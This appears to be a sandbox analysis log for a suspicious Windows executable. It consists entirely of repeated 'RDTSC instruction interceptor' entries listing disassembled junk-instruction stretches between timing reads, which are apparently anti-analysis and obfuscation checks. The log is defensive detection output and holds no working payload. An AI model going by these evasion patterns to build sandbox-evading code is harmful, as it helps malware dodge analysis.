Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 724C99 second address: 724CB2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7905006506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e je 00007F7905006506h 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 724CB2 second address: 724CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 724DE6 second address: 724DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 72523C second address: 725242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 723B69 second address: 723B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 72ED29 second address: 72ED35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F7905119FB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 72ED35 second address: 72ED3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 72ED3B second address: 72ED3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 72ED3F second address: 72ED5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F7905006512h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 733FE2 second address: 734008 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7905119FBBh 0x0000000d jmp 00007F7905119FC3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 734008 second address: 73400E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 732F49 second address: 732F50 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 733075 second address: 733082 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7905006506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 73356E second address: 733574 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 732ABC second address: 732AD0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7905006506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jc 00007F7905006506h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 732AD0 second address: 732AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 733AAB second address: 733ACC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7905006516h 0x00000008 jl 00007F7905006506h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 733D12 second address: 733D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 jnp 00007F7905119FB6h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7905119FC2h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 733D34 second address: 733D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7361B0 second address: 7361B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7361B4 second address: 7361B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7361B8 second address: 7361CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7905119FB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F7905119FB6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7361CC second address: 7361D8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7905006506h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6AD0F8 second address: 6AD100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 738B19 second address: 738B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7905006517h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F7905006506h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 738CAA second address: 738CBA instructions: 0x00000000 rdtsc 0x00000002 je 00007F7905119FB6h 0x00000008 jp 00007F7905119FB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 738CBA second address: 738CC1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 738CC1 second address: 738CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 73D081 second address: 73D08B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7905006506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 73D08B second address: 73D096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 73D20F second address: 73D226 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7905006506h 0x00000008 jno 00007F7905006506h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 73D226 second address: 73D22B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 73D22B second address: 73D233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 73D233 second address: 73D23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 73D66D second address: 73D671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 73D671 second address: 73D692 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7905119FC9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7400D7 second address: 7400F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7905006518h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7400F3 second address: 74014C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7905119FC3h 0x00000008 jmp 00007F7905119FC9h 0x0000000d jmp 00007F7905119FC9h 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007F7905119FBDh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74014C second address: 740152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 740152 second address: 740179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jc 00007F7905119FBEh 0x0000000e push edx 0x0000000f pop edx 0x00000010 je 00007F7905119FB6h 0x00000016 pushad 0x00000017 jmp 00007F7905119FBCh 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 744771 second address: 74477C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74477C second address: 744785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 744785 second address: 744789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 744789 second address: 74478F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74478F second address: 7447AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F7905006527h 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F790500650Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 744D32 second address: 744D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jc 00007F7905119FB6h 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 744D41 second address: 744D50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F790500650Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 745B89 second address: 745B9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F7905119FB6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 745B9B second address: 745BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7905006514h 0x0000000c jnc 00007F7905006506h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74E81E second address: 74E82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7905119FBDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74C759 second address: 74C778 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7905006515h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74C8B7 second address: 74C8BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74C8BB second address: 74C8C4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74C8C4 second address: 74C8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7905119FBBh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F7905119FB6h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74CBCE second address: 74CBD8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7905006506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74D1C7 second address: 74D1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7905119FC6h 0x00000009 pop esi 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74D4F3 second address: 74D4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74D4F7 second address: 74D518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74D826 second address: 74D852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7905006517h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74D852 second address: 74D86E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74D86E second address: 74D878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74D878 second address: 74D87C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74D87C second address: 74D882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74D882 second address: 74D888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74D888 second address: 74D88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74DB9A second address: 74DB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 74E221 second address: 74E232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F790500650Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 752C87 second address: 752C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7905119FB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 756758 second address: 75676F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905006512h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 755CC2 second address: 755CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 756007 second address: 756018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7905006506h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 756018 second address: 75601C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 75601C second address: 75602E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F7905006506h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7562FD second address: 75630D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F7905119FB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 75630D second address: 756311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 756311 second address: 75631B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7905119FB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 75631B second address: 756327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 756327 second address: 756341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6B587D second address: 6B5881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6B5881 second address: 6B5893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6B5893 second address: 6B58A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F7905006506h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6B58A8 second address: 6B58AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 6B58AD second address: 6B58B7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F790500650Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7592BB second address: 7592E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F7905119FB6h 0x00000009 jbe 00007F7905119FB6h 0x0000000f popad 0x00000010 pushad 0x00000011 jo 00007F7905119FB6h 0x00000017 jg 00007F7905119FB6h 0x0000001d je 00007F7905119FB6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 7634FC second address: 763502 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 763502 second address: 76350E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 76350E second address: 763513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 761ADE second address: 761AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 761AE6 second address: 761AF0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 761AF0 second address: 761AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 761C65 second address: 761C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F790500650Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 761C77 second address: 761C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 761C7B second address: 761C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 761C8C second address: 761C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jbe 00007F7905119FB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 761C9C second address: 761CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7905006506h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 761CA8 second address: 761CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 763366 second address: 763370 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7905006506h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
